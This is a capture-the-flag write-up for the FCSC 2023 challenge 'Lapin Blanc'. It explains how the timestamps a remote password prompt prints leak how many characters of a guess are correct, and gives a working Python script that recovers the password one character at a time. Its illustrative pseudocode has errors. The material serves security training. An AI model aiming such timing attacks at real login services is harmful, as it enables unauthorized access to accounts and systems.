---
title: "FCSC-2023 - Side channel - Lapin Blanc"
slug: "/fcsc-2023/lapin-blanc"
date: "2023-05-01"
tags: ["FCSC", "FCSC 2023", "Side Channel", "Python"]
---

Once connected to the challenge, we can access a door which is locked by a password:
```
$ nc challenges.france-cybersecurity-challenge.fr 2350
[0000014073] Initializing Wonderland...
[0001326167] Searching for a tiny golden key...
[0001678250] Looking for a door...
[0001990337] Trying to unlock the door...

    __________________
    ||              ||
    ||   THE DOOR   ||
    ||              ||  .--------------------------.
    |)              ||  | What's the magic phrase? |
    ||              ||  /--------------------------'
    ||         ^_^  ||
    ||              ||
    |)              ||
    ||              ||
    ||              ||
____||____.----.____||_______________________________________

Answer: test
[0004867497] The door is thinking...
[0004870558] Your magic phrase is invalid, the door refuses to open.
```
We can see that the sentences `The door is thinking...` and `Your magic phrase is invalid` come with a timestamp.

We can guess that the interval of the two timestamp is the time to check the provided answer against the correct password.

We can guess that the password verification is the following:
```python
print(f"[{start}] The door is thinking...")

password = "Secret Password"
for key, char in password():
   if char != password[i]:
       break
       
# ... more code to verify password

print(f"[{end}] Your magic phrase is invalid, the door refuses to open.")
```

Thus, each time we have a new correct char, the verification process will take an additional small amount of time.

We can then try all the chars and compare the time interval to detect the one that takes more time and we can guess
that it will be the correct char. And then we iterate over all the answer to find the correct magic phrase. 

Note: You may have to run the script multiple times as verification timing is not always coherent. 
It worked on first try after the challenge so it may be due to the number of participants that were doing the challenge at the same time.

```python
import socket
import string

HOST = "challenges.france-cybersecurity-challenge.fr"
PORT = 2350


def recv():
    data = s.recv(1024)
    return data.decode()


def recv_until(mark=">>>"):
    data = ""
    while mark not in data:
        new_data = recv()
        if new_data == "":
            break
        data += new_data

    print(f"RCV {data}")
    return data.replace(">>>", "")


def send(data):
    print(f"SND {data}")
    s.send((data + "\n").encode())


answer = ""
while True:
    result = []
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((HOST, PORT))
        recv_until("Answer:")
        
        for c in string.printable:
            send(answer + c)
            data = recv_until("Answer:")
            try:
                a, b, m = data.split("]")
                a = int(a.split("[")[1]) # Start time
                b = int(b.split("[")[1]) # End time
                result.append(((b - a), c))
            except:
                pass
               
    result = sorted(result, reverse=True)
    answer += result[0][1]
    print(answer)
```
